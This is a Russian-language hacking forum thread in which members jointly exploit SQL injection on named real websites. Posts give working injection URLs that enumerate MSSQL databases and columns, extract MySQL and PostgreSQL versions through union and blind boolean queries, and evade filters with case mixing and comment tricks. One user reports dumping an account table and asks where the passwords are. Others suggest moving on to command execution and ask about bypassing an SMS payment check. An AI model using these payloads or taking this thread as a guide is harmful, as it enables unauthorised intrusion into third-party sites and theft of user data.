Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    кидай
     
    2 people like this.
  2. newpdv

    newpdv New Member

    Joined:
    4 Sep 2008
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Нет идей??
     
  3. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    С помощью DB_NAME(n) перебирая n я нашел еще
    1)master
    2)tempdb
    3)model
    4)msdb
    5)lin2db
    6)lin2comm
    7)l2gloss
    8)lin2world
    9) lin2log
    10)lin2clancomm
    SELECT user_name();
    SELECT system_user;
    SELECT user;
    имя юзера stat и имя таблицы с помощью:
    DB_NAME() - имя таблицы: lin2world


    версия - 1 or 1=@@version--
    таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('имя таблицы'))--

    Проблема в том что запросы такого видв не проходят.
    http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6,7,8,9,0,11,12--
    Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
    Можно ли с использованием union select сделать что нибудь?
    Плиз скажите как с ними работать и что полезного и как из них взять.
    Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.
     
  4. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Не получается раскрутить
    http://www.carochasolicar.com/detalhesp.php?tipo=4'
    Двойной запрос? Попробуйте плз, кому не лень.
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка


    fedi, доступа к базам л2-сервара нету

    http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db.user_account

    Его как правило и не бывает. С этими базами работает непосредственно л2-сервер
     
  6. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?
     
  7. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    по моему это просто раскрытие пути и вовсе не скуля
     
    1 person likes this.
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    нету там фильтра на from
    http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+INFORMATION_SCHEMA.TABLES--
     
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
    Версия пятая.

    http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

    что можно сделать? Очень нужен совет.
     
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

    5.0.67-community



    С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету
     
    #5931 ElteRUS, 15 Mar 2009
    Last edited: 15 Mar 2009
    2 people like this.
  12. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    @Imperou$
    у меня Forbidden, попробуй регистрт UnIoN+sElEcT или union%0aselect
     
  13. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    ElteRUS я невнимательный идиот.Спасибо большое, а ларчик просто открывался :)
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.customoutfitters.com/co_home/products.php?productCat=4

    Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=
     
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((select+version()),0,1))>1

    PostgreSQL 8.1.3

    http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((select+tablename+from+pg_tables+limit+1+offset+0),1,1))>1

    Дальше сам
     
    1 person likes this.
  16. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    хоть я не очень дружу с MSSQL но так на вскидку:
    смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):
    PHP:
    http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4,5,6,7,DB_NAME(0),9,1,1,1--
    lin2world - 1
    master - 1
    tempdb - 1
    model - 0
    msdb - 1
    lin2db - 0
    lin2comm - 0
    l2gloss - 0
    lin2world - 1
    lin2log - 0
    lin2clancomm - 0
    смотрим таблички и колонки доступные текушему пользователю
    PHP:
    http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,QUOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCHEMA.COLUMNS--
    крч ничего особено хорошего нету.
     
    3 people like this.
  17. user777

    user777 New Member

    Joined:
    25 Feb 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Господа, помогите с таким вопросом.
    На чем построена система скачки файлов сайта ... допустим http://ikino.by/ ?
    Вот - http://ikino.by/download/ns_echelon_conspiracy_2009_dvdscr.avi.html сама система получения\верификации полученного по СМС кода.
    Что это за система? На чем построена? Есть ли известные способы обхода данной системы?
    Может кто что знает.
    Заранее спасибо за ответ.
     
  18. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Я вытащил базу аккаунтов, жалко паролей нету((
     
  19. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    __http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QU OTENAME(TABLE_NAME),4,5,6,7,Q UOT ENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCH EMA.C O LUMNS--

    может кто нить подскажет к можно пароли найти? нашел все аккаунты их ид даты создания, а поролей и ящиков нету((
     
    #5939 fedi, 16 Mar 2009
    Last edited: 16 Mar 2009
  20. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Тебе же популярно все обьяснили и разжували - нету доступа к определеным БД где скорее всего и храниться пароли и мыла и тп, копай теперь в направлении выполнения команд через mssql.
     
    1 person likes this.
Thread Status:
Not open for further replies.